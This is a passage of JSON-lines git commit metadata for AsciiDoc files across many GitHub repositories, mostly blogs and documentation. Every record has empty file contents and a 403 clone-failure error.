file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/delete-worker-not-exist\/curl-request.adoc","new_file":"xill-web-service\/tmp-test\/delete-worker-not-exist\/curl-request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/XillioQA\/xill-platform-3.4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b23cfb84b45da81450f88e2186e04123ad87c3b9","subject":"Update 2016-02-20-Comecando-com-Cordova.adoc","message":"Update 2016-02-20-Comecando-com-Cordova.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-02-20-Comecando-com-Cordova.adoc","new_file":"_posts\/2016-02-20-Comecando-com-Cordova.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19c5ad96cc8035ee26508880ea6bd8984dd7faa5","subject":"Update manual about C-style #line and #include directive.","message":"Update manual about C-style #line and #include directive.\n","repos":"dneto0\/shaderc,antiagainst\/shaderc,Qining\/shaderc,davidlee80\/shaderc,drewet\/shaderc,fuchsia-mirror\/third_party-shaderc,antiagainst\/shaderc,Samana\/shaderc,fuchsia-mirror\/third_party-shaderc,AWoloszyn\/shaderc,antiagainst\/shaderc,dneto0\/shaderc,fuchsia-mirror\/third_party-shaderc,AWoloszyn\/shaderc,Samana\/shaderc,dneto0\/shaderc,davidlee80\/shaderc,Samana\/shaderc,drewet\/shaderc,antiagainst\/shaderc,Qining\/shaderc,davidlee80\/shaderc,AWoloszyn\/shaderc,Qining\/shaderc,drewet\/shaderc,dneto0\/shaderc","old_file":"glslc\/README.asciidoc","new_file":"glslc\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Qining\/shaderc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e3b82a3425e55261a39900f1f5faa3f9a8569a6a","subject":"create post I Bought The Cheapest Smartphone on Amazon...","message":"create post I Bought The Cheapest Smartphone on Amazon...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-I-Bought-The-Cheapest-Smartphone-on-Amazon....adoc","new_file":"_posts\/2018-02-26-I-Bought-The-Cheapest-Smartphone-on-Amazon....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4dc3d9dd3c8112fec54301b0f5ffecef87189c1","subject":"Add lab08 task","message":"Add lab08 task","repos":"slbedu\/javase8-2016","old_file":"lab08\/README.adoc","new_file":"lab08\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/slbedu\/javase8-2016.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"736f0b8d247e766c39e91ed302682fd1770348a3","subject":"Create README.adoc","message":"Create 
README.adoc","repos":"markfisher\/sk8s,markfisher\/sk8s,markfisher\/sk8s,markfisher\/sk8s","old_file":"helm-charts\/README.adoc","new_file":"helm-charts\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markfisher\/sk8s.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"89fc2467afd66af4016a3ae736b39786150297a5","subject":"0.10.0.Beta2 release announcement","message":"0.10.0.Beta2 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-06-28-debezium-0-10-0-beta2-released.adoc","new_file":"blog\/2019-06-28-debezium-0-10-0-beta2-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2d151466234d7e36a1fb6cdda9ec4def7fb95137","subject":"y2b create post NYC Trip - Behind the Scenes #1","message":"y2b create post NYC Trip - Behind the Scenes #1","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-04-20-NYC-Trip--Behind-the-Scenes-1.adoc","new_file":"_posts\/2015-04-20-NYC-Trip--Behind-the-Scenes-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe77cab114f95f01320873a2472a3d3b1db91a43","subject":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","message":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50206c28f70eacc16f2903e90211a567c60638b6","subject":"Update 2017-09-05-Getting-Started-with-Hubpress.adoc","message":"Update 2017-09-05-Getting-Started-with-Hubpress.adoc","repos":"alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io","old_file":"_posts\/2017-09-05-Getting-Started-with-Hubpress.adoc","new_file":"_posts\/2017-09-05-Getting-Started-with-Hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alimasyhur\/alimasyhur.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f75b46d6047046e48bf02acda1ee018c7134afa5","subject":"Add note about CLISP and Hunchentoot","message":"Add note about CLISP and Hunchentoot\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} 
{"commit":"ee3394e484692e4da09d4c8e3a6034b23edd6318","subject":"CL - HTML template lib","message":"CL - HTML template lib\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"c9d6d689a19ed03a348d521b2d63a2dfad92d8f7","subject":"dump from lecture on routing and \"not covering multicasting\"-multicasting","message":"dump from lecture on routing and \"not covering multicasting\"-multicasting\n","repos":"jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405","old_file":"lecture12_20171115.adoc","new_file":"lecture12_20171115.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/netwtcpip-cmp405.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6aaec85008c1a93b3745087746376e76accfa39","subject":"Update 2016-02-04-Hallo-from-Tekk.adoc","message":"Update 2016-02-04-Hallo-from-Tekk.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ac69f5efc85ff918574425b46c62e3e1f6ef879","subject":"y2b create post New Monster Headphones CES 2012","message":"y2b create post New Monster Headphones CES 2012","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-12-New-Monster-Headphones-CES-2012.adoc","new_file":"_posts\/2012-01-12-New-Monster-Headphones-CES-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"186df4f5eea169cf04ba5a9578d2c9082859c293","subject":"Update 2016-07-15-Update-Whats-New-in-Version-060.adoc","message":"Update 2016-07-15-Update-Whats-New-in-Version-060.adoc","repos":"HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2016-07-15-Update-Whats-New-in-Version-060.adoc","new_file":"_posts\/2016-07-15-Update-Whats-New-in-Version-060.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97e2e1b3f5aacb4540575bea76c48a2dc291443a","subject":"Document version","message":"Document version\n","repos":"microserviceux\/muon-node,microserviceux\/muon-node","old_file":"doc\/version.adoc","new_file":"doc\/version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/microserviceux\/muon-node.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eaf1f0c6055c6ac85a7456b09b40746c0eceaecb","subject":"Update Asciidoctor.adoc","message":"Update Asciidoctor.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Asciidoctor.adoc","new_file":"Linux\/Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61dd5ae20e0ec585bb247b605f4d035531f55fe9","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0517ac6b8c5ad66f84db35476592aacc0bb5ff2","subject":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","message":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1cea03b0e4a9b9055f1e06e786f3a374ecd7e1f2","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/ukraine_nov_2017.adoc","new_file":"content\/writings\/ukraine_nov_2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"889764e89593fa9a9e9ba9f8fa52f80e6e8c6a94","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca69297d83cab04d12546e4e0f5e07442ad20839","subject":"y2b create post The Unboxing Time Machine - NES 1985","message":"y2b create post The Unboxing Time Machine - NES 
1985","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-01-The-Unboxing-Time-Machine--NES-1985.adoc","new_file":"_posts\/2016-12-01-The-Unboxing-Time-Machine--NES-1985.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a41c8f68511ac5c6bd38a195627df12a0bed14b","subject":"y2b create post PICK YOUR PRIZE EPIC WINNER!","message":"y2b create post PICK YOUR PRIZE EPIC WINNER!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-22-PICK-YOUR-PRIZE-EPIC-WINNER.adoc","new_file":"_posts\/2011-09-22-PICK-YOUR-PRIZE-EPIC-WINNER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"752cbc1f29716346ccafba16b80b256d2ef37ce4","subject":"Update 2016-06-09-i-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-i-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-i-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-i-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e3ecefe8bfc5553413c2e6308c161f5bdf1fc0a","subject":"Update 2016-12-01-There-was-a-keynote-lecture.adoc","message":"Update 2016-12-01-There-was-a-keynote-lecture.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-01-There-was-a-keynote-lecture.adoc","new_file":"_posts\/2016-12-01-There-was-a-keynote-lecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a3ed78c06f3b0b18c61013545119432a3500c81","subject":"Update 2017-05-24-Use-After-Free-fun-in-glibc.adoc","message":"Update 2017-05-24-Use-After-Free-fun-in-glibc.adoc","repos":"icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io","old_file":"_posts\/2017-05-24-Use-After-Free-fun-in-glibc.adoc","new_file":"_posts\/2017-05-24-Use-After-Free-fun-in-glibc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/icthieves\/icthieves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b2c6d09c804e75d8e14f8b7cd96810bc6e70477","subject":"Update 2018-11-11-Go-2.adoc","message":"Update 
2018-11-11-Go-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Go-2.adoc","new_file":"_posts\/2018-11-11-Go-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aeab70c63c30cf54933fda68a25470b31329acdd","subject":"Update 2019-11-23-oyl3.adoc","message":"Update 2019-11-23-oyl3.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-11-23-oyl3.adoc","new_file":"_posts\/2019-11-23-oyl3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a1f88fbca323ce2864781948e5b17a5ba0ee83b","subject":"y2b create post Giant Mystery Unboxing...","message":"y2b create post Giant Mystery Unboxing...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-15-Giant-Mystery-Unboxing.adoc","new_file":"_posts\/2016-12-15-Giant-Mystery-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"968497ad97faad6b4fb7b89ccdfa42109e85018f","subject":"added readme","message":"added readme\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee58617c0cfd56340bbd6e4751ae82b9e441ca30","subject":"[docs] Added steps to update HMS after migrating to multiple Kudu masters","message":"[docs] Added steps to update HMS after migrating to multiple Kudu masters\n\nChange-Id: Iab3999c9e581ed3591b220c08491cdae867c91db\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8948\nReviewed-by: Jean-Daniel Cryans <4bf4c125525b8623ac45dfd7774cbf531df19085@apache.org>\nTested-by: Jean-Daniel Cryans 
<4bf4c125525b8623ac45dfd7774cbf531df19085@apache.org>\n","repos":"helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c2054ae89c2e8217e655c71a1f83b38947fa438d","subject":"[docs] minor cleanup on multi-master migration doc","message":"[docs] minor cleanup on multi-master migration doc\n\nmaster_data_dirs --> master_data_dir in the list of arguments for\nthe kudu CLI too to be consistent with the description of those.\n\nChange-Id: I88e724a9d27e4e08610e6941b613ba13faa4c5ec\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/11458\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3ed4aacfcb476b0ef7daf658a8b790eb3cddfb4b","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbb5531cdfc72259813303e439ba7bff5746d65a","subject":"Publish 2016-10-08.adoc","message":"Publish 2016-10-08.adoc","repos":"jjmean2\/server-study,jjmean2\/server-study,jjmean2\/server-study,jjmean2\/server-study","old_file":"2016-10-08.adoc","new_file":"2016-10-08.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jjmean2\/server-study.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0726e35d8847fc1b7c3963b3bef05f5eb026b80","subject":"write(promise-library): Promise\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u306b\u3064\u3044\u3066\u3092\u8ffd\u52a0","message":"write(promise-library): Promise\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u306b\u3064\u3044\u3066\u3092\u8ffd\u52a0\n\nPolyfill \u3068 \u62e1\u5f35\u30e9\u30a4\u30d6\u30e9\u30ea\u306e 2\u30b8\u30e3\u30f3\u30eb\n","repos":"liyunsheng\/promises-book,oToUC\/promises-book,genie88\/promises-book,sunfurong\/promise,azu\/promises-book,liyunsheng\/promises-book,genie88\/promises-book,mzbac\/promises-book,purepennons\/promises-book,charlenopires\/promises-book,genie88\/promises-book,wenber\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,wenber\/promises-book,dieface\/promises-book,liubin\/promises-book,sunfurong\/promise,tangjinzhou\/promises-book,charlenopires\/promises-book,dieface\/promises-book,mzbac\/promises-book,xifeiwu\/promises-book,azu\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,cqricky\/promises-book,liubin\/promises-book,purepennons\/promises-book,xifeiwu\/promises-book,oToUC\/promises-book,tangjinzhou\/promises-book,purepennons\/promises-book,liubin\/promises-book,wangwei1237\/promises-book,wangwei1237\/promises-book,xifeiwu\/promises-book,oToUC\/promises-book,azu\/promises-book,liyunsheng\/promises-book,charlenopires\/promises-book,cqricky\/promises-book,wenber\/promises-book,lidasong2014\/promises-book,tangjinzhou\/promises-book,wangwei1237\/promises-book,cqricky\/promises-book,azu\/promises-book,sunfurong\/promise","old_file":"Ch4_AdvancedPromises\/promise-library.adoc","new_file":"Ch4_AdvancedPromises\/promise-library.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6f0121eabee1c4c4b6c66b403359f606562cd5e","subject":"Update 2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","message":"Update 2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","new_file":"_posts\/2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62189d7c45ca8716da74b68f3eba7663684bfe5e","subject":"Add int","message":"Add 
int\n","repos":"leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11652_enforce_jdk_8\/11652_enforce_jdk_8.int.adoc","new_file":"doc-bridgepoint\/notes\/11652_enforce_jdk_8\/11652_enforce_jdk_8.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmulvey\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4afdec5c351d321e3de47b027938c412f6edddb9","subject":"Update 2015-10-25-Middleman.adoc","message":"Update 2015-10-25-Middleman.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Middleman.adoc","new_file":"_posts\/2015-10-25-Middleman.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a13d59820bf215232c12a34c1e0bef9e31fb04d","subject":"Use correct version number for inputs tool","message":"Use correct version number for inputs tool","repos":"ninja-build\/ninja,ninja-build\/ninja,AoD314\/ninja,AoD314\/ninja,ninja-build\/ninja,AoD314\/ninja,ninja-build\/ninja,AoD314\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AoD314\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"112f85e1536b82d5f0bd84ceea5df4634151dfa9","subject":"Fix typo","message":"Fix 